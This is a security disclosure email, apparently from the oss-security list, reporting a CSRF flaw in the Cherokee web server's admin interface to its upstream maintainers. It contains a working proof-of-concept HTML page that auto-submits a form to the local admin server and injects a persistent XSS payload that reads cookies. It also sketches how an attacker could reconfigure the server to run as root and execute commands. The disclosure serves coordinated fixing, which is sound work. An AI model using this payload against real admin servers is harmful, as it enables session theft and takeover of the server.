Security issue in cherokee

[Jamie Strandboge <jamie () canonical com>]

A security bug was reported against cherokee in Ubuntu. You are being
emailed as the upstream contact. Please keep oss-security[1] CC'd for
any updates on this issue.

This issue should be considered public, but has not yet been assigned a
CVE. Once a CVE is assigned, please mention it in any changelogs.

Details from the public bug follow:
https://launchpad.net/bugs/784632

From the reporter:
----
The cherokee admin server is vulnerable to csrf.

Using csrf it is possible to produce a persistent xss in several pages -
including the 'status' page via the 'nickname field' of a vserver.
An example of this is the following:

<html>
<body>
 <form action="http://127.0.0.1:9090/vserver/apply"; method="post"
id="xssform">
 <input type="text" name="tmp!new_droot" value='/var/www/'></input>
 <input type="text" name="tmp!new_nick" value='" onselect=alert(1)
autofocus> <embed src="javascript:alert(document.cookie)">'></input>
</form>
<script>document.getElementById("xssform").submit();</script>
</body>

A Worst case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on
localhost:9090 then if they visit a $bad page - the bad page may be able
to send requests to the server so as to reconfigure it to:

1. run as root
2. the logging of error(or access) will run a command ...
----

Thanks in advance for your cooperation in coordinating a fix for this
issue,

Jamie Strandboge

[1] oss-security () lists openwall com is a public mailing list for
    people to collaborate on security vulnerabilities and coordinate
    security updates.

-- 
Jamie Strandboge             | http://www.canonical.com

Attachment: signature.asc
Description: This is a digitally signed message part